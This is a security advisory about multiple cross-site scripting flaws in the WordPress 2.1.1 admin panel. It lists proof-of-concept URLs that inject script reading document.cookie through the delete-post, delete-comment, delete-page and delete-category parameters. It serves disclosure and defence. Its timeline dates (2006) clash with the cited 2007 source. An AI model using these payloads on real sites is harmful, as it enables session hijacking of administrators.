|
|
|
|
| |
| "WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability." Multiple script injection vulnerabilities have been discovered in WordPress, these allows remote attackers to insert arbitrary HTML and/or JavaScript into the pages returned to the client. |
| |
Credit:
The information has been provided by Stefan Friedli - scip AG.
The original article can be found at: http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
|
| |
Vulnerable Systems:
* WordPress version 2.1.1
Stefan Friedli found several vulnerabilities based on an advisory entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which described a lack of input validation when deleting posts that allows injection of arbitrary code. The vulnerability was reported on February, 26th and is referenced in section VII.
Further to this vulnerability which was limited on manipulating the "post"-parameter, there are several other vulnerabilities which are very similar to the one mentioned above. Every operation that makes use of the common confirm-dialog is vulnerable for this type of attack.
Possible injection...
... when deleting posts as mentioned in Samenspenders advisory (unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete &post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39 &c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete &post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
http://target.tld/wp-admin/categories.php?action=delete& cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment& p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Impact:
This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the "Delete Post"-function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site-scripting or any other webbased exploitation.
Temporary Solution:
Until these issues are patched, possible workarounds are manual fixing or the usage of a application level filter like mod_security for Apache.
Sources:
Samenspender - WordPress AdminPanel CSRF/XSS - 0day http://seclists.org/bugtraq/2007/Feb/0494.html
Disclosure Timeline:
02/26/06 - Release of "Delete Post"-Confirmation Vulnerability
02/27/06 - Identification of further vulnerabilities
02/27/06 - Immediate Release for informational purposes
|
|
|
|
|
|
|
